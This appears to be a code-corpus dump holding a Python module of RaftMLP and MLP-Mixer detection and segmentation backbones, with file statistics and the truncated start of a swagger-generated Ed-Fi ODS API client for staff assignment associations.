2022-02-16T21:32:40.000Z
|
import copy
import math
from einops import rearrange
from mmcv.runner import BaseModule
from mmdet.models.builder import BACKBONES as DET_BACKBONES
from mmseg.models.builder import BACKBONES as SEG_BACKBONES
from torch import nn
from libs.consts import ORIGINAL_TM, EMB_MIXER, SER_PM, EMB_CROSS_MLP
from libs.models import RaftMLP
class DetRaftMLP(RaftMLP, BaseModule):
    """RaftMLP backbone adapter for mmdetection.

    Wraps RaftMLP as an mmdet BaseModule: the classification head is
    replaced with identities and forward() returns a tuple of per-stage
    feature maps instead of logits.
    """

    def __init__(self,
                 layers,
                 dropout,
                 token_mixing_type,
                 embedding_type,
                 drop_path_rate,
                 init_cfg,
                 ):
        super(DetRaftMLP, self).__init__(
            layers=layers,
            in_channels=3,
            pretrained_image_size=224,
            num_classes=1000,
            token_expansion_factor=2,
            channel_expansion_factor=4,
            dropout=dropout,
            token_mixing_type=token_mixing_type,
            embedding_type=embedding_type,
            shortcut=False,
            drop_path_rate=drop_path_rate
        )
        self._is_init = False
        self.init_cfg = copy.deepcopy(init_cfg)
        # Strip the classification head: the backbone only emits features.
        self.heads = nn.Identity()
        self.classifier = nn.Identity()
        # Filled by the forward hook with intermediate stage-0 features.
        self.features = []

    def forward(self, input):
        output = []

        def forward_hook(module, inputs, outputs):
            # Reshape the token sequence back into a (b, c, h, w) map using
            # the level's grid size.
            self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
                h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
                w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())

        # Hook sub-block 1 of the first level to capture an early feature map.
        handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1,)]
        for i, layer in enumerate(self.layers):
            input = self.levels[i](input)
            if i == 0:
                # Stage 0's contribution comes from the hooked features, not
                # the stage output itself.
                output = self.features
            else:
                output.append(input.contiguous())
        self.features = []
        # Remove hooks so repeated forward passes do not accumulate.
        for handle in handles:
            handle.remove()
        return tuple(output)
@DET_BACKBONES.register_module()
class DetRaftMLPSmall(DetRaftMLP):
    """Small RaftMLP detection backbone (stage dims 64/128/256/512)."""

    def __init__(self, *args, **kwargs):
        super(DetRaftMLPSmall, self).__init__(
            layers=[
                {"depth": 2, "dim": 64, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
                {"depth": 2, "dim": 128, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
                {"depth": 6, "dim": 256, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
                {"depth": 2, "dim": 512, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
            ],
            dropout=0.,
            token_mixing_type=SER_PM,
            embedding_type=EMB_CROSS_MLP,
            drop_path_rate=0.,
            *args, **kwargs
        )
@DET_BACKBONES.register_module()
class DetRaftMLPMedium(DetRaftMLP):
    """Medium RaftMLP detection backbone (stage dims 96/192/384/768)."""

    def __init__(self, *args, **kwargs):
        super(DetRaftMLPMedium, self).__init__(
            layers=[
                {"depth": 2, "dim": 96, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
                {"depth": 2, "dim": 192, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
                {"depth": 6, "dim": 384, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
                {"depth": 2, "dim": 768, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
            ],
            dropout=0.,
            token_mixing_type=SER_PM,
            embedding_type=EMB_CROSS_MLP,
            drop_path_rate=0.,
            *args, **kwargs
        )
@DET_BACKBONES.register_module()
class DetRaftMLPLarge(DetRaftMLP):
    """Large RaftMLP detection backbone (stage dims 128/192/512/1024)."""

    def __init__(self, *args, **kwargs):
        super(DetRaftMLPLarge, self).__init__(
            layers=[
                {"depth": 2, "dim": 128, "patch_size": 4, "raft_size": 2, "embedding_kernels": [4, 8]},
                {"depth": 2, "dim": 192, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
                {"depth": 6, "dim": 512, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2, 4]},
                {"depth": 2, "dim": 1024, "patch_size": 2, "raft_size": 2, "embedding_kernels": [2]},
            ],
            dropout=0.,
            token_mixing_type=SER_PM,
            embedding_type=EMB_CROSS_MLP,
            drop_path_rate=0.,
            *args, **kwargs
        )
@DET_BACKBONES.register_module()
class DetOrgMixer(DetRaftMLP):
    """Original MLP-Mixer configuration (single 12-deep stage) exposed as a
    detection backbone."""

    def __init__(self, *args, **kwargs):
        super(DetOrgMixer, self).__init__(
            layers=[
                {"depth": 12, "dim": 768, "patch_size": 16},
            ],
            dropout=0.,
            token_mixing_type=ORIGINAL_TM,
            embedding_type=EMB_MIXER,
            drop_path_rate=0.,
            *args, **kwargs
        )

    def forward(self, input):
        output = []

        def forward_hook(module, inputs, outputs):
            # Reshape the token sequence back into a (b, c, h, w) map.
            self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
                h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
                w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())

        # Single-stage model: tap blocks 1, 5 and 11 for intermediate maps.
        handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1, 5, 11)]
        for i, layer in enumerate(self.layers):
            input = self.levels[i](input)
            if i == 0:
                output = self.features
            # Unlike DetRaftMLP.forward there is no "else" here: the final
            # stage output is appended in addition to the hooked features.
            output.append(input.contiguous())
        self.features = []
        for handle in handles:
            handle.remove()
        return tuple(output)
class SegRaftMLP(RaftMLP, BaseModule):
    """RaftMLP adapted as a segmentation backbone.

    Wraps the classification ``RaftMLP``: the classification head is
    replaced with identity modules and ``forward`` returns per-level
    feature maps instead of logits.
    """

    def __init__(self,
                 layers,
                 dropout,
                 token_mixing_type,
                 embedding_type,
                 drop_path_rate,
                 init_cfg,
                 ):
        # Build the underlying classifier with fixed pretraining-style
        # settings; the head created here is discarded below.
        super(SegRaftMLP, self).__init__(
            layers=layers,
            in_channels=3,
            pretrained_image_size=224,
            num_classes=1000,
            token_expansion_factor=2,
            channel_expansion_factor=4,
            dropout=dropout,
            token_mixing_type=token_mixing_type,
            embedding_type=embedding_type,
            shortcut=False,
            drop_path_rate=drop_path_rate
        )
        # Set BaseModule-style state by hand since only RaftMLP.__init__
        # ran via super() above (presumably mirrors mmcv's BaseModule
        # attributes — confirm against the installed mmcv version).
        self._is_init = False
        self.init_cfg = copy.deepcopy(init_cfg)
        # Disable the classification head; the backbone only emits features.
        self.heads = nn.Identity()
        self.classifier = nn.Identity()
        # Buffer filled by forward hooks during ``forward``.
        self.features = []

    def forward(self, input):
        """Return a tuple with one feature map per level.

        A forward hook on sub-block 1 of the first level captures that
        level's feature map; outputs of the remaining levels are appended
        directly.
        """
        output = []

        def forward_hook(module, inputs, outputs):
            # Tokens back to (B, C, H, W) using the first level's patch grid.
            self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
                h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
                w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())
        handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1,)]
        for i, layer in enumerate(self.layers):
            input = self.levels[i](input)
            if i == 0:
                # First level: use the hook-captured feature map(s).
                output = self.features
            else:
                output.append(input.contiguous())
        # Reset the capture buffer and detach the hooks for the next call.
        self.features = []
        for handle in handles:
            handle.remove()
        return tuple(output)
@SEG_BACKBONES.register_module()
class SegRaftMLPSmall(SegRaftMLP):
    """RaftMLP-S configuration registered as a segmentation backbone."""

    def __init__(self, *args, **kwargs):
        # Four-stage pyramid: channel width doubles per stage (64 -> 512).
        stage_cfgs = [
            dict(depth=2, dim=64, patch_size=4, raft_size=2, embedding_kernels=[4, 8]),
            dict(depth=2, dim=128, patch_size=2, raft_size=2, embedding_kernels=[2, 4]),
            dict(depth=6, dim=256, patch_size=2, raft_size=2, embedding_kernels=[2, 4]),
            dict(depth=2, dim=512, patch_size=2, raft_size=2, embedding_kernels=[2]),
        ]
        super(SegRaftMLPSmall, self).__init__(
            *args,
            layers=stage_cfgs,
            dropout=0.0,
            token_mixing_type=SER_PM,
            embedding_type=EMB_CROSS_MLP,
            drop_path_rate=0.0,
            **kwargs
        )
@SEG_BACKBONES.register_module()
class SegRaftMLPMedium(SegRaftMLP):
    """RaftMLP-M configuration registered as a segmentation backbone."""

    def __init__(self, *args, **kwargs):
        # Four-stage pyramid: channel width doubles per stage (96 -> 768).
        stage_cfgs = [
            dict(depth=2, dim=96, patch_size=4, raft_size=2, embedding_kernels=[4, 8]),
            dict(depth=2, dim=192, patch_size=2, raft_size=2, embedding_kernels=[2, 4]),
            dict(depth=6, dim=384, patch_size=2, raft_size=2, embedding_kernels=[2, 4]),
            dict(depth=2, dim=768, patch_size=2, raft_size=2, embedding_kernels=[2]),
        ]
        super(SegRaftMLPMedium, self).__init__(
            *args,
            layers=stage_cfgs,
            dropout=0.0,
            token_mixing_type=SER_PM,
            embedding_type=EMB_CROSS_MLP,
            drop_path_rate=0.0,
            **kwargs
        )
@SEG_BACKBONES.register_module()
class SegRaftMLPLarge(SegRaftMLP):
    """RaftMLP-L configuration registered as a segmentation backbone."""

    def __init__(self, *args, **kwargs):
        # Four-stage pyramid, widest variant (128 -> 1024 channels).
        stage_cfgs = [
            dict(depth=2, dim=128, patch_size=4, raft_size=2, embedding_kernels=[4, 8]),
            dict(depth=2, dim=192, patch_size=2, raft_size=2, embedding_kernels=[2, 4]),
            dict(depth=6, dim=512, patch_size=2, raft_size=2, embedding_kernels=[2, 4]),
            dict(depth=2, dim=1024, patch_size=2, raft_size=2, embedding_kernels=[2]),
        ]
        super(SegRaftMLPLarge, self).__init__(
            *args,
            layers=stage_cfgs,
            dropout=0.0,
            token_mixing_type=SER_PM,
            embedding_type=EMB_CROSS_MLP,
            drop_path_rate=0.0,
            **kwargs
        )
@SEG_BACKBONES.register_module()
class SegOrgMixer(SegRaftMLP):
    """Original MLP-Mixer (B/16-style: 12 blocks, dim 768, 16x16 patches)
    wrapped as a segmentation backbone with a single level."""

    def __init__(self, *args, **kwargs):
        super(SegOrgMixer, self).__init__(
            layers=[
                {"depth": 12, "dim": 768, "patch_size": 16},
            ],
            dropout=0.,
            token_mixing_type=ORIGINAL_TM,
            embedding_type=EMB_MIXER,
            drop_path_rate=0.,
            *args, **kwargs
        )

    def forward(self, input):
        """Run the single mixer level and return a tuple of feature maps.

        Overrides SegRaftMLP.forward: hooks are placed on sub-blocks 1, 5
        and 11 (not just 1), and the final level output is appended
        unconditionally, yielding three hook captures plus one final map —
        assuming each hooked block fires exactly once per call.
        """
        output = []

        def forward_hook(module, inputs, outputs):
            # Reshape the token sequence back to a (B, C, H, W) map using
            # the first level's patch grid.
            self.features.append(rearrange(outputs, "b (h w) c -> b c h w",
                h=math.ceil(self.levels[0].h / self.levels[0].patch_size),
                w=math.ceil(self.levels[0].w / self.levels[0].patch_size)).contiguous())
        handles = [self.levels[0].fn[i].register_forward_hook(forward_hook) for i in (1, 5, 11)]
        for i, layer in enumerate(self.layers):
            input = self.levels[i](input)
            if i == 0:
                # Adopt the hook-collected list as the output (aliasing is
                # intentional: the append below extends the same list).
                output = self.features
            output.append(input.contiguous())
        # Reset the capture buffer and detach the hooks for the next call.
        self.features = []
        for handle in handles:
            handle.remove()
        return tuple(output)
| 38.101399
| 115
| 0.533358
| 1,237
| 10,897
| 4.440582
| 0.105093
| 0.03823
| 0.039323
| 0.078646
| 0.910249
| 0.888039
| 0.888039
| 0.835609
| 0.835609
| 0.835609
| 0
| 0.036732
| 0.330458
| 10,897
| 285
| 116
| 38.235088
| 0.716146
| 0
| 0
| 0.844622
| 0
| 0
| 0.107553
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071713
| false
| 0
| 0.035857
| 0
| 0.163347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5459a4357fea29d72017c89972765af3065f78db
| 47,287
|
py
|
Python
|
src/v5.3/resources/swagger_client/api/staff_education_organization_assignment_associations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 2
|
2021-04-27T17:18:17.000Z
|
2021-04-27T19:14:39.000Z
|
src/v5.3/resources/swagger_client/api/staff_education_organization_assignment_associations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | null | null | null |
src/v5.3/resources/swagger_client/api/staff_education_organization_assignment_associations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 1
|
2022-01-06T09:43:11.000Z
|
2022-01-06T09:43:11.000Z
|
# coding: utf-8
"""
Ed-Fi Operational Data Store API
The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501
OpenAPI spec version: 3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class StaffEducationOrganizationAssignmentAssociationsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_staff_education_organization_assignment_association_by_id(self, id, **kwargs):  # noqa: E501
    """Deletes an existing resource using the resource identifier.  # noqa: E501

    The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_staff_education_organization_assignment_association_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant yields, so one call covers both cases.
    return self.delete_staff_education_organization_assignment_association_by_id_with_http_info(id, **kwargs)  # noqa: E501
def delete_staff_education_organization_assignment_association_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Deletes an existing resource using the resource identifier.  # noqa: E501

    The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_staff_education_organization_assignment_association_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str id: A resource identifier that uniquely identifies the resource. (required)
    :param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['id', 'if_match']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot of the local namespace (self, id, kwargs, all_params);
    # validated keyword arguments are merged in below. Adding any new
    # local before this line would change the snapshot's contents.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_staff_education_organization_assignment_association_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if self.api_client.client_side_validation and ('id' not in params or
                                                   params['id'] is None):  # noqa: E501
        raise ValueError("Missing the required parameter `id` when calling `delete_staff_education_organization_assignment_association_by_id`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []

    header_params = {}
    # The If-Match header makes the DELETE conditional on the ETag.
    if 'if_match' in params:
        header_params['If-Match'] = params['if_match']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/staffEducationOrganizationAssignmentAssociations/{id}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def deletes_staff_education_organization_assignment_associations(self, **kwargs):  # noqa: E501
    """Retrieves deleted resources based on change version.  # noqa: E501

    The DELETES operation is used to retrieve deleted resources.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.deletes_staff_education_organization_assignment_associations(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int offset: Indicates how many items should be skipped before returning results.
    :param int limit: Indicates the maximum number of items that should be returned in the results.
    :param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
    :param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
    :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
    :return: list[DeletedResource]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant yields, so one call covers both cases.
    return self.deletes_staff_education_organization_assignment_associations_with_http_info(**kwargs)  # noqa: E501
def deletes_staff_education_organization_assignment_associations_with_http_info(self, **kwargs):  # noqa: E501
    """Retrieves deleted resources based on change version.  # noqa: E501

    The DELETES operation is used to retrieve deleted resources.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.deletes_staff_education_organization_assignment_associations_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int offset: Indicates how many items should be skipped before returning results.
    :param int limit: Indicates the maximum number of items that should be returned in the results.
    :param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
    :param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
    :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
    :return: list[DeletedResource]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'snapshot_identifier']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot of the local namespace; validated keyword arguments are
    # merged in below. Adding any new local before this line would change
    # the snapshot's contents.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method deletes_staff_education_organization_assignment_associations" % key
            )
        params[key] = val
    del params['kwargs']

    # Client-side range checks: page size must be within 0..500.
    if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500):  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `deletes_staff_education_organization_assignment_associations`, must be a value less than or equal to `500`")  # noqa: E501
    if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0):  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `deletes_staff_education_organization_assignment_associations`, must be a value greater than or equal to `0`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    # Map snake_case parameters onto the API's camelCase query string.
    query_params = []
    if 'offset' in params:
        query_params.append(('offset', params['offset']))  # noqa: E501
    if 'limit' in params:
        query_params.append(('limit', params['limit']))  # noqa: E501
    if 'min_change_version' in params:
        query_params.append(('minChangeVersion', params['min_change_version']))  # noqa: E501
    if 'max_change_version' in params:
        query_params.append(('maxChangeVersion', params['max_change_version']))  # noqa: E501

    header_params = {}
    if 'snapshot_identifier' in params:
        header_params['Snapshot-Identifier'] = params['snapshot_identifier']  # noqa: E501

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2_client_credentials']  # noqa: E501

    return self.api_client.call_api(
        '/ed-fi/staffEducationOrganizationAssignmentAssociations/deletes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[DeletedResource]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_staff_education_organization_assignment_associations(self, **kwargs):  # noqa: E501
    """Retrieves specific resources using the resource's property values (using the \"Get\" pattern).  # noqa: E501

    This GET operation provides access to resources using the \"Get\" search pattern.  The values of any properties of the resource that are specified will be used to return all matching results (if it exists).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_staff_education_organization_assignment_associations(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int offset: Indicates how many items should be skipped before returning results.
    :param int limit: Indicates the maximum number of items that should be returned in the results.
    :param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
    :param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
    :param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response.  If set to false, 'Total-Count' header will not be provided.
    :param str staff_classification_descriptor: The titles of employment, official status, or rank of education staff.
    :param date begin_date: Month, day, and year of the start or effective date of a staff member's employment, contract, or relationship with the education organization.
    :param int education_organization_id: The identifier assigned to an education organization.
    :param str staff_unique_id: A unique alphanumeric code assigned to a staff.
    :param str credential_identifier: Identifier or serial number assigned to the credential.
    :param str state_of_issue_state_abbreviation_descriptor: The abbreviation for the name of the state (within the United States) or extra-state jurisdiction in which a license/credential was issued.
    :param int employment_education_organization_id: The identifier assigned to an education organization.
    :param str employment_status_descriptor: Reflects the type of employment or contract; for example: Probationary Contractual Substitute/temporary Tenured or permanent Volunteer/no contract ...
    :param date employment_hire_date: The month, day, and year on which an individual was hired for a position.
    :param date end_date: Month, day, and year of the end or termination date of a staff member's employment, contract, or relationship with the education organization.
    :param float full_time_equivalency: The ratio between the hours of work expected in a position and the hours of work normally expected in a full-time position in the same setting.
    :param str id:
    :param int order_of_assignment: Describes whether the assignment is this the staff member's primary assignment, secondary assignment, etc.
    :param str position_title: The descriptive name of an individual's position.
    :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
    :return: list[EdFiStaffEducationOrganizationAssignmentAssociation]
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths return exactly what the
    # *_with_http_info variant yields, so one call covers both cases.
    return self.get_staff_education_organization_assignment_associations_with_http_info(**kwargs)  # noqa: E501
def get_staff_education_organization_assignment_associations_with_http_info(self, **kwargs):  # noqa: E501
    """Retrieves specific resources using the resource's property values (using the \"Get\" pattern).  # noqa: E501

    This GET operation provides access to resources using the \"Get\" search pattern.  The values of any properties of the resource that are specified will be used to return all matching results (if it exists).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_staff_education_organization_assignment_associations_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int offset: Indicates how many items should be skipped before returning results.
    :param int limit: Indicates the maximum number of items that should be returned in the results.
    :param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
    :param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
    :param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response.  If set to false, 'Total-Count' header will not be provided.
    :param str staff_classification_descriptor: The titles of employment, official status, or rank of education staff.
    :param date begin_date: Month, day, and year of the start or effective date of a staff member's employment, contract, or relationship with the education organization.
    :param int education_organization_id: The identifier assigned to an education organization.
    :param str staff_unique_id: A unique alphanumeric code assigned to a staff.
    :param str credential_identifier: Identifier or serial number assigned to the credential.
    :param str state_of_issue_state_abbreviation_descriptor: The abbreviation for the name of the state (within the United States) or extra-state jurisdiction in which a license/credential was issued.
    :param int employment_education_organization_id: The identifier assigned to an education organization.
    :param str employment_status_descriptor: Reflects the type of employment or contract; for example: Probationary Contractual Substitute/temporary Tenured or permanent Volunteer/no contract ...
    :param date employment_hire_date: The month, day, and year on which an individual was hired for a position.
    :param date end_date: Month, day, and year of the end or termination date of a staff member's employment, contract, or relationship with the education organization.
    :param float full_time_equivalency: The ratio between the hours of work expected in a position and the hours of work normally expected in a full-time position in the same setting.
    :param str id:
    :param int order_of_assignment: Describes whether the assignment is this the staff member's primary assignment, secondary assignment, etc.
    :param str position_title: The descriptive name of an individual's position.
    :param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
    :return: list[EdFiStaffEducationOrganizationAssignmentAssociation]
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'total_count', 'staff_classification_descriptor', 'begin_date', 'education_organization_id', 'staff_unique_id', 'credential_identifier', 'state_of_issue_state_abbreviation_descriptor', 'employment_education_organization_id', 'employment_status_descriptor', 'employment_hire_date', 'end_date', 'full_time_equivalency', 'id', 'order_of_assignment', 'position_title', 'snapshot_identifier']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot of the local namespace; validated keyword arguments are
    # merged in below. Adding any new local before this line would change
    # the snapshot's contents.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_staff_education_organization_assignment_associations" % key
            )
        params[key] = val
    del params['kwargs']

    # Client-side checks mirroring the API spec: limit within 0..500 and
    # maximum lengths for the string-valued filters.
    if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500):  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `get_staff_education_organization_assignment_associations`, must be a value less than or equal to `500`")  # noqa: E501
    if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0):  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `get_staff_education_organization_assignment_associations`, must be a value greater than or equal to `0`")  # noqa: E501
    if self.api_client.client_side_validation and ('staff_classification_descriptor' in params and
                                                   len(params['staff_classification_descriptor']) > 306):
        raise ValueError("Invalid value for parameter `staff_classification_descriptor` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `306`")  # noqa: E501
    if self.api_client.client_side_validation and ('staff_unique_id' in params and
                                                   len(params['staff_unique_id']) > 32):
        raise ValueError("Invalid value for parameter `staff_unique_id` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `32`")  # noqa: E501
    if self.api_client.client_side_validation and ('credential_identifier' in params and
                                                   len(params['credential_identifier']) > 60):
        raise ValueError("Invalid value for parameter `credential_identifier` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `60`")  # noqa: E501
    if self.api_client.client_side_validation and ('state_of_issue_state_abbreviation_descriptor' in params and
                                                   len(params['state_of_issue_state_abbreviation_descriptor']) > 306):
        raise ValueError("Invalid value for parameter `state_of_issue_state_abbreviation_descriptor` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `306`")  # noqa: E501
    if self.api_client.client_side_validation and ('employment_status_descriptor' in params and
                                                   len(params['employment_status_descriptor']) > 306):
        raise ValueError("Invalid value for parameter `employment_status_descriptor` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `306`")  # noqa: E501
    if self.api_client.client_side_validation and ('position_title' in params and
                                                   len(params['position_title']) > 100):
        raise ValueError("Invalid value for parameter `position_title` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `100`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    # Map snake_case parameters onto the API's camelCase query string.
    query_params = []
    if 'offset' in params:
        query_params.append(('offset', params['offset']))  # noqa: E501
    if 'limit' in params:
        query_params.append(('limit', params['limit']))  # noqa: E501
    if 'min_change_version' in params:
        query_params.append(('minChangeVersion', params['min_change_version']))  # noqa: E501
    if 'max_change_version' in params:
        query_params.append(('maxChangeVersion', params['max_change_version']))  # noqa: E501
    if 'total_count' in params:
        query_params.append(('totalCount', params['total_count']))  # noqa: E501
    if 'staff_classification_descriptor' in params:
        query_params.append(('staffClassificationDescriptor', params['staff_classification_descriptor']))  # noqa: E501
    if 'begin_date' in params:
        query_params.append(('beginDate', params['begin_date']))  # noqa: E501
    if 'education_organization_id' in params:
        query_params.append(('educationOrganizationId', params['education_organization_id']))  # noqa: E501
    if 'staff_unique_id' in params:
        query_params.append(('staffUniqueId', params['staff_unique_id']))  # noqa: E501
    if 'credential_identifier' in params:
        query_params.append(('credentialIdentifier', params['credential_identifier']))  # noqa: E501
    if 'state_of_issue_state_abbreviation_descriptor' in params:
